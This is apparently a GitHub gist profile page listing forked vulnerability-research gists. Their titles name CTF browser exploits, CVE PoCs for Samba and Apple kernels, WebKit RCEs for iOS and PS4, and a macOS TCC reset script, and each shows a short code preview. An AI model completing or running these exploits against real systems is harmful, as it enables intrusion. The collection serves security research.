boy1337 bb33bb

💭

I may be slow to respond.

Majoring in Civil Engineering & English as Vulnerability researcher.

bb33bb / index.html

Created April 20, 2022 15:22 — forked from hkraw/index.html

GoogleCtf 2021 fullchain

	<html>
	<head>
	<title>google-ctf fullchain</title>
	</head>
	<body>
	<h1>HK</h1>
	<pre id='log'></pre>
	</body>
	<script src='./mojo/mojo_bindings.js'></script>
	<script src="./mojo/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>

bb33bb / poc.c

Created March 18, 2022 13:29 — forked from jakeajames/poc.c

CVE-2021-30955 PoC

	#include <stdlib.h>
	#include <stdio.h>
	#include <pthread/pthread.h>
	#include <mach/mach.h>

	struct ool_msg {
	mach_msg_header_t hdr;
	mach_msg_body_t body;
	mach_msg_ool_ports_descriptor_t ool_ports[];
	};

bb33bb / UB18-Qemu-AARCH64.md

Created March 18, 2022 07:20 — forked from itzurabhi/UB18-Qemu-AARCH64.md

Run Ubuntu 18.04 on Qemu AARCH64 / ARM64

Install the dependecies

sudo apt install qemu-system-arm qemu-system-mips qemu-efi-aarch64 qemu-kvm qemu-efi cloud-image-utils

dd if=/dev/zero of=flash0.img bs=1M count=64
dd if=/usr/share/qemu-efi/QEMU_EFI.fd of=flash0.img conv=notrunc

bb33bb / exploit.c

Created March 1, 2022 05:46 — forked from jakeajames/exploit.c

leak address of segment_list in oob_timestamp

	//
	// exploit.c
	// extra_time
	//
	// Created by Jake James on 2/8/20.
	// Copyright © 2020 Jake James. All rights reserved.
	//

	#include "exploit.h"
	#include "IOAccelerator_stuff.h"

bb33bb / CVE-2021-44142.py

Created February 20, 2022 01:33 — forked from 0xsha/CVE-2021-44142.py

CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write

	# CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write
	# (C) 2022 - 0xSha.io - @0xSha
	# This PoC is un-weaponized and for educational purposes only .
	# To learn how to use the PoC please read the writeup :
	# https://0xsha.io/blog/a-samba-horror-story-cve-2021-44142
	# requires samba4-python

	# Refrences :
	# https://www.thezdi.com/blog/2022/2/1/cve-2021-44142-details-on-a-samba-code-execution-bug-demonstrated-at-pwn2own-austin
	# Patch : https://attachments.samba.org/attachment.cgi?id=17092

bb33bb / exploit.html

Created February 14, 2022 13:37 — forked from ujin5/exploit.html

0CTF/TCTF 2020 Quals Chromium

	<script id="worker1">
	worker:{
	if (typeof window === 'object') break worker;
	self.onmessage = function() {
	console.log("onmessage")
	}
	}
	</script>
	<script src="../mojo_bindings.js"></script>
	<script src="../third_party/blink/public/mojom/tstorage/tstorage.mojom.js"></script>

bb33bb / fuck.js

Created February 14, 2022 13:34 — forked from ujin5/fuck.js

WebKit RCE on ios 14.1

	function sleep( sleepDuration ){
	var now = new Date().getTime();
	while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
	}
	function gc() {
	for (let i = 0; i < 0x10; i++) {
	new ArrayBuffer(0x1000000);
	}
	}
	let data_view = new DataView(new ArrayBuffer(8));

bb33bb / tcc-reset.py

Created December 2, 2021 06:12 — forked from haircut/tcc-reset.py

Completely reset TCC services database in macOS

	#!/usr/bin/python
	"""
	Completely reset TCC services database in macOS

	Note: Both the system and individual users have TCC databases; run the script as both
	a user and as root to completely reset TCC decisions at all levels.

	2018-08-15: Resetting the 'Location' service fails; unknown cause
	2018-08-16: Confirmed the 'All' service does not really reset _all_
	services, so individual calls to each service is necessary.

bb33bb / TFC2021-Chrome-V8.mjs

Created November 5, 2021 05:36 — forked from vngkv123/TFC2021-Chrome-V8.mjs

bb33bb / ps4.html

Created October 28, 2021 02:20 — forked from sleirsgoevy/ps4.html

PS4 WebKit exploit on 9.00

	<script>
	var PAGE_SIZE = 16384;
	var SIZEOF_CSS_FONT_FACE = 0xb8;
	var HASHMAP_BUCKET = 208;
	var STRING_OFFSET = 20;
	var SPRAY_FONTS = 0x1000;
	var GUESS_FONT = 0x200430000;
	var NPAGES = 20;
	var INVALID_POINTER = 0;
	var HAMMER_FONT_NAME = "font8"; //must take bucket 3 of 8 (counting from zero)